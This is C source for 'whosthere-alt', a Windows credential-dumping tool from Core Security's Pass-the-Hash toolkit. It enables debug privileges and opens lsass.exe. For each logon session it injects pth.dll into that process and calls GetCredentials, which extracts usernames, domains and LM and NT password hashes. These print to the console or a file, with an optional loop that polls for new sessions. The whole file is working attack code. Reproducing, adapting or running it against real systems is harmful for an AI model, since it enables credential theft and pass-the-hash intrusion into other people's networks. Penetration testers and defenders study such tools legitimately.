// $Id: whosthere-alt.c,v 1.14 2008/05/30 17:56:55 hochoa Exp $
//
#include <windows.h>
#include <string.h>
#include <ntsecapi.h>
#include <stdio.h>
#include <psapi.h>
#include <tlhelp32.h>
#include "injectdll.h"
#include "pth.h"
#include "getopt.h"

/*
 * whosthere-alt.c
 *
 * Description:  Whosthere (alternative method)
 *
 * Author: Hernan Ochoa (hochoa@coresecurity.com) (hernan@gmail.com)
 *
 * Copyright (c) 2007-2008 Hernan Ochoa, Buenos Aires, Argentina.
 * All rights reserved.
 *
 *
 * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
WARRANTIES
 * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY
DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES
 * RESULTING FROM THE USE OR MISUSE OF ANY RECOMPILATION OF THIS SOURCE
 * CODE NOT PROVIDED BY CORE SDI S.A.
 **/

#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)

static BOOL g_debugEnabled			= 0;
static BOOL g_infiniteWaitEnabled		= FALSE;
static BOOL g_dumpToFile                        = FALSE;
static char g_dumpFile[1024];

#pragma  pack(1)
typedef struct  {
	
	char username[1024];
	char domain[1024];
	char authpkg[1024];
	LUID logonID;
	BYTE LMhash[32];
	BYTE NThash[32];
	
} PTH_LOGON_SESSION_DATA;

// typedef for session information
#define LOGONSESSIONINFO_USERNAMELEN	90
#define LOGONSESSIONINFO_DOMAINNAMELEN	90

typedef struct {
	
	LUID luid;
	char username[LOGONSESSIONINFO_USERNAMELEN];
	char domainname[LOGONSESSIONINFO_DOMAINNAMELEN];
	BYTE LMhash[16];
	BYTE NThash[16]; 
		
} LOGON_SESSION_INFO;


LOGON_SESSION_INFO **g_ppLogonSessions;
unsigned int g_logonSessionsCount = 0;
unsigned int g_previousSessionCount = 0;

BOOL printLogonSession( LOGON_SESSION_INFO *pLogonSession);
BOOL addLogonSession( LOGON_SESSION_INFO* pLogonSession);
void printLogonSessionsArray();




BOOL printLogonSession( LOGON_SESSION_INFO *pLogonSession)
{
unsigned int v;
FILE *fp;
	if( !pLogonSession ) return FALSE;

        if( g_dumpToFile == TRUE && strlen(g_dumpFile) > 1) {
                
                fp = fopen(g_dumpFile, "ab");
                fprintf(fp, "%s:%s:", pLogonSession->username, pLogonSession->domainname);
        	for(v=0; v<0x10; v++) fprintf(fp, "%.2X", pLogonSession->LMhash[v]);
                fprintf(fp, ":");
        	for(v=0; v<0x10; v++) fprintf(fp,"%.2X", pLogonSession->NThash[v]);
                fclose(fp);
        
        } else {
                printf("%s:%s:", pLogonSession->username, pLogonSession->domainname);
        	for(v=0; v<0x10; v++) printf("%.2X", pLogonSession->LMhash[v]);
                printf(":");
        	for(v=0; v<0x10; v++) printf("%.2X", pLogonSession->NThash[v]);
        }
	return TRUE;
}

void printLogonSessionsArray( )
{
unsigned int n;
FILE *fp;


	for(n =0; n<g_logonSessionsCount; n++){
		if( g_ppLogonSessions[n] ) {
			printLogonSession( g_ppLogonSessions[n] );
                        if( g_dumpToFile == TRUE && strlen(g_dumpFile) > 1){
                                fp = fopen(g_dumpFile, "ab");
                                fprintf(fp, "\r\n");
                                fclose(fp);
                        }
                        else printf("\n");
		}
		
	}


}

BOOL addLogonSession( LOGON_SESSION_INFO* pLogonSession)
{
unsigned int n;
BOOL bisOldSession;
LOGON_SESSION_INFO* pItem;
LOGON_SESSION_INFO** pNewArray;
unsigned int uItemsCount;
DWORD dwTemp;



	if( !pLogonSession ) return FALSE;
	
	bisOldSession = FALSE;
	for(n =0; n<g_logonSessionsCount; n++)
	{
		pItem = g_ppLogonSessions[n];
		if( pItem ) {
			if( !strcmp(pItem->username, pLogonSession->username) &&
			   !strcmp(pItem->domainname, pLogonSession->domainname) &&
			   !memcmp(pItem->LMhash, pLogonSession->LMhash, 16) &&
			   !memcmp(pItem->NThash, pLogonSession->NThash, 16) )
			{
				bisOldSession = TRUE;
				break;
			}
			
			
		}
		
	}
	
	if( bisOldSession == TRUE) return FALSE;
	
	uItemsCount = g_logonSessionsCount+1;
	pNewArray = (LOGON_SESSION_INFO**)malloc( sizeof(LOGON_SESSION_INFO*)*uItemsCount );
	if( pNewArray == NULL) {
		if( g_debugEnabled == TRUE) {
			printf("something terrible happened! could not allocate memory for new list!\n");
		}
		return FALSE;
	}
	
	// copy existing sessions to new array
	for(n=0; n<g_logonSessionsCount; n++)
			pNewArray[n] = (LOGON_SESSION_INFO*)g_ppLogonSessions[n];
	
	
	// could not add new item, this is terribleeeeeee :)
	pItem = (LOGON_SESSION_INFO*)malloc( sizeof(LOGON_SESSION_INFO) );
	if( pItem == NULL) {
		if( pNewArray ) free(pNewArray);
		return FALSE;
	}
	
	
	
	pNewArray[uItemsCount-1] = pItem;
	
	memset((BYTE*)pItem, '\x00', sizeof(LOGON_SESSION_INFO));
	strncpy(pItem->username, pLogonSession->username, LOGONSESSIONINFO_USERNAMELEN-2);
	// paranoid android, anyways not enough
	pItem->username[LOGONSESSIONINFO_USERNAMELEN-1] = '\x00';
	strncpy(pItem->domainname, pLogonSession->domainname, LOGONSESSIONINFO_DOMAINNAMELEN-1);
	// paranoid andriod, anyways not enough
	pItem->domainname[LOGONSESSIONINFO_DOMAINNAMELEN-1] = '\x00';
	memcpy(pItem->LMhash, pLogonSession->LMhash, 16);
	memcpy(pItem->NThash, pLogonSession->NThash, 16);

	g_logonSessionsCount++;
	dwTemp = (DWORD)g_ppLogonSessions;
	g_ppLogonSessions = pNewArray;
	if( dwTemp ) free( (VOID*)dwTemp );
	
	return TRUE;		
	
}


 
BOOL GetLogonSessionData(PLUID pLogonID, PTH_LOGON_SESSION_DATA* pPTHLogonSessionData)
{
PSECURITY_LOGON_SESSION_DATA sessionData = NULL;
NTSTATUS retval;
BYTE buffer[1024], *pData;
unsigned int n, j;

  
	if ( !pLogonID || !pPTHLogonSessionData ) return FALSE;
	
	retval = LsaGetLogonSessionData (pLogonID, &sessionData);
	if (retval != STATUS_SUCCESS) {
		if (sessionData)  LsaFreeReturnBuffer(sessionData);
    		return FALSE;
	}
	
	if( !sessionData ) return FALSE;

	// get LogonID	
	pPTHLogonSessionData->logonID = *pLogonID;
    
	
	// get username
	memset(buffer, '\0', sizeof(buffer));
	n = 0;
	j = 0;
	if (sessionData->UserName.Buffer != NULL) {
		pData = (BYTE*) (sessionData->UserName).Buffer;
		for( n=0; n<sizeof(buffer); n++, j+=2)
		{
			if( n >= (sessionData->UserName).Length ) {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] == '\x00') {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] != '\x00' ) {
				
				buffer[n] = pData[j];
			}
		}
		buffer[sizeof(buffer)-1]='\x00';
	}
	
	memset(pPTHLogonSessionData->username, '\x00', 1024);
	memcpy(pPTHLogonSessionData->username, buffer, 1024);

	// Get domain name
	memset(buffer, '\0', sizeof(buffer));
	n = 0;
	j = 0;
	if (sessionData->LogonDomain.Buffer != NULL) {
		pData = (BYTE*) (sessionData->LogonDomain).Buffer;
		for( n=0; n<sizeof(buffer); n++, j+=2)
		{
			if( n >= (sessionData->LogonDomain).Length ) {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] == '\x00') {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] != '\x00' ) {
				
				buffer[n] = pData[j];
			}
		}
		buffer[sizeof(buffer)-1]='\x00';
	}
	
	memset(pPTHLogonSessionData->domain, '\x00', 1024);
	memcpy(pPTHLogonSessionData->domain, buffer, 1024);
	
	// Get Authentication Package
	memset(buffer, '\0', sizeof(buffer));
	n = 0;
	j = 0;
	if (sessionData->AuthenticationPackage.Buffer != NULL) {
		pData = (BYTE*) (sessionData->AuthenticationPackage).Buffer;
		for( n=0; n<sizeof(buffer); n++, j+=2)
		{
			if( n >= (sessionData->AuthenticationPackage).Length ) {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] == '\x00') {
				buffer[n] = '\x00';
				break;
			}
			
			if( pData[j] != '\x00' ) {
				
				buffer[n] = pData[j];
			}
		}
		buffer[sizeof(buffer)-1]='\x00';
	}
	
	memset(pPTHLogonSessionData->authpkg, '\x00', 1024);
	memcpy(pPTHLogonSessionData->authpkg, buffer, 1024);
	

    

	if(sessionData)  LsaFreeReturnBuffer(sessionData);
	return TRUE;
}

DWORD GetPidByName( char* szProcessName )
{
HANDLE hProcessSnap;
HANDLE hProcess;
PROCESSENTRY32 pe32;

	if( !szProcessName ) return 0;

	// Take a snapshot of all processes in the system.
	hProcessSnap = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
	if( hProcessSnap == INVALID_HANDLE_VALUE )
	{
		return 0;
	}

	// Set the size of the structure before using it.
	pe32.dwSize = sizeof( PROCESSENTRY32 );

	// Retrieve information about the first process,
	// and exit if unsuccessful
	if( !Process32First( hProcessSnap, &pe32 ) )
	{
		CloseHandle( hProcessSnap );          // clean the snapshot object
		return 0;
	}

	// Now walk the snapshot of processes, and
	// display information about each process in turn
	do
	{

		if( strstr( pe32.szExeFile, szProcessName) )
		{
			CloseHandle( hProcessSnap );
			return (DWORD)pe32.th32ProcessID;
		}


	} while( Process32Next( hProcessSnap, &pe32 ) );

	CloseHandle( hProcessSnap );
	return 0;
}


void banner(void)
{

	printf("WHOSTHERE-ALT v1.1 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 Core Security Technologies\n");
	printf("This tool lists the active LSA logon sessions with NTLM credentials.\n");
        printf("use -h for help.\n");
        
	
}

void help(void)
{
	printf("Options:  \n");
	printf("\t-D\t\tprints debug information\n");
        printf("\t-i\t\twhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. Only new sessions are shown if found.\n");
	printf("\t-t\t\testablishes interval used by the -i switch (by default 2 seconds).\n");
        printf("\t-o\t\tdump output to a file, -o filename\n");
}



int main(int argc, char **argv)
{
HANDLE hLSASS;
DWORD dwLSASS_pid;
char buffer[1024];
BOOL bRet;
int j;
unsigned int n=0, x=0, y=0;
PBYTE pTemp;
DWORD credPtr;
PLUID pLogonIDs;
ULONG ulLogonSessionsCount;
ULONG ulValidLogonSessionsCount;
NTSTATUS retval;
PTH_LOGON_SESSION_DATA pthLogonSessionData;
INJECTDLLANDCALLPARAM injectparams;
PTHPARAMS* pPthparams;
char szCurrentDir[1024];
char szDlltoinjectName[1024];
LOGON_SESSION_INFO      _logonSessionInfo;
double searchInterval = 0;


		banner();

		// check if pth.dll is in the current directory
		// if it is not, throw an error and exit.
		if( !GetFileAttributes(".\\pth.dll") ) {
			printf("Error: pth.dll is not in the current directory!.\n");
			exit(0);
		}

		// check parameters
		while(1) {
			unsigned int c = getopt(argc, argv, "-DhHiIo:t:");
			if( c == -1 ) break;
			
			switch( c ) {
				case 'D': g_debugEnabled = 1; break;
                                case 'I':
                                case 'i':
                                        g_infiniteWaitEnabled = TRUE;
					searchInterval = 2;
                                        break;
				case 't':
					searchInterval = atof(optarg);
					break;
                                case 'o':
                                        // whatever...
                                        memset(g_dumpFile, '\x00', sizeof(g_dumpFile));
                                        strncpy(g_dumpFile, optarg, sizeof(g_dumpFile)-1);
                                        g_dumpFile[ sizeof(g_dumpFile)-1] = '\x00';
                                        g_dumpToFile = TRUE;
                                        break;
                                        
                                        
                                case 'H':
				case 'h':
                                        help();
					return 0;
				
				default:
                                        help();
                                        return 0;
					
					
				
			}
			
		}


		if( searchInterval )
			printf("Time Interval (in seconds): %f\n", searchInterval);

                printf("the output format is: username:domain:lmhash:nthash\n\n");

		if( EnableDebugPrivs() == FALSE ) {
					printf("Could not enable debug privileges. You must run this tool with an account with administrator privileges.\n");
					exit(0);
		}

		memset(buffer, '\0', 1024);

		dwLSASS_pid = GetPidByName("lsass.exe");
		if( dwLSASS_pid == 0 ) {
			printf("Cannot get LSASS.EXE PID!\n");
			exit(0);
		}

		hLSASS = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwLSASS_pid);

		if( g_debugEnabled ) {

			printf("LSASS HANDLE: %x\n", hLSASS);

		}
		if( hLSASS == INVALID_HANDLE_VALUE ) {
			printf("Error: Cannot open LSASS.EXE!.\n");
			exit(0);
		}
	
		
		// Now we enumerate logon sessions

// horrible horrible hack! I promise I'll fix it 
endlessLoop:
		retval = LsaEnumerateLogonSessions( &ulLogonSessionsCount, &pLogonIDs );
		if (retval != STATUS_SUCCESS ) {
			printf("Can't enumerate logon sessions!\n");
			exit(0);
		}
		
		
                if( g_debugEnabled ) {
                        printf("Logon Sessions Found: %d\n", ulLogonSessionsCount);
                }
	
		
                // we allocate the PTHPARAM structure to call the function inside LSASS.EXE
                pPthparams = (PTHPARAMS*)malloc( sizeof(PTHPARAMS) );
		if( pPthparams == NULL ) {
				printf("Cannot alloc pthparams!.");
				exit(0);
				
		}
		
		injectparams.param = (BYTE*)pPthparams;
		injectparams.param_len = sizeof(PTHPARAMS);
                strcpy( injectparams.functionName, "GetCredentials" );
		
		memset( szCurrentDir, '\x00', sizeof(szCurrentDir));
		GetCurrentDirectory(  sizeof(szCurrentDir)-1, szCurrentDir );
		szCurrentDir[ sizeof(szCurrentDir)-1 ] = '\x00';
		_snprintf( szDlltoinjectName, sizeof(szDlltoinjectName)-1, "%s\\%s", szCurrentDir, "pth.dll");
                
                
		for ( n = 0; n < ulLogonSessionsCount; n++ ) {
			
			if( GetLogonSessionData( &pLogonIDs[ n ], &pthLogonSessionData ) == TRUE )
			{
				//printf("%s\\%s:%s\n", pthLogonSessionData.domain, pthLogonSessionData.username, pthLogonSessionData.authpkg);
				//printf("LUID.LowPart:%.8Xh\n", pthLogonSessionData.logonID.LowPart);
				//printf("LUID.HighPart:%.8Xh\n", pthLogonSessionData.logonID.HighPart);
                                
                                pPthparams->LogonID = pthLogonSessionData.logonID;
                                pPthparams->bRet = FALSE;
                                
                                // Now we try to inject the DLL that will dump the info for us
                                if ( InjectDllAndCallFunction( GetPidByName("lsass.exe"), szDlltoinjectName, &injectparams) == FALSE )
                                {
			
                                        printf("Error in InjectDllAndCallFunction");
                                }
                		else {
		
                                         if( pPthparams->bRet == TRUE ) {
                                                
                                                unsigned int i;


                                                
                                                
                                                // copy data to _logonSessionInfo
                                                memset( _logonSessionInfo.username, '\x00', LOGONSESSIONINFO_USERNAMELEN);
                				memset( _logonSessionInfo.domainname, '\x00', LOGONSESSIONINFO_DOMAINNAMELEN);
				
                                                strncpy( _logonSessionInfo.username, pPthparams->username, LOGONSESSIONINFO_USERNAMELEN-2);
                                                // paranoid android, anyways not enough
                                        	_logonSessionInfo.username[LOGONSESSIONINFO_USERNAMELEN-1] = '\x00';
                                                strncpy( _logonSessionInfo.domainname, pPthparams->domainname, LOGONSESSIONINFO_DOMAINNAMELEN-2);
                                                // paranoid andriod, anyways not enough
                                        	_logonSessionInfo.domainname[LOGONSESSIONINFO_DOMAINNAMELEN-1] = '\x00';
                				
                				// copy hashes to _logonSessionInfo
                                                memcpy((PBYTE)&_logonSessionInfo.NThash[0], (PBYTE)pPthparams->NThash, 16);
                				memcpy((PBYTE)&_logonSessionInfo.LMhash[0], (PBYTE)pPthparams->LMhash, 16);
				
                                                addLogonSession( &_logonSessionInfo );
                                                
                                                
                                        }
                			else {
                                                
                				//printf("An error occurred obtaining the credentials.\n");
                                        }
			
                                }
				
				
			}
			
		}
				
	
                
		free( pPthparams );
		LsaFreeReturnBuffer( pLogonIDs );
                
                if( g_infiniteWaitEnabled ) {

		
		if( g_logonSessionsCount > g_previousSessionCount)
		{
			
			for(n=0; n<g_logonSessionsCount-g_previousSessionCount; n++) {
				printLogonSession( g_ppLogonSessions[n+g_previousSessionCount] );
                                if( !g_dumpToFile )
                                        printf("\n");
                                else {
                                        FILE *fp;
                                        fp = fopen(g_dumpFile, "ab");
                                        fprintf(fp, "\r\n");
                                        fclose(fp);
                                        
                                }
			}
				
				
			g_previousSessionCount = g_logonSessionsCount;
		}

		Sleep(searchInterval*1000);
		goto endlessLoop;
		
		
                }
                
                printLogonSessionsArray();
         
                
                
                

}
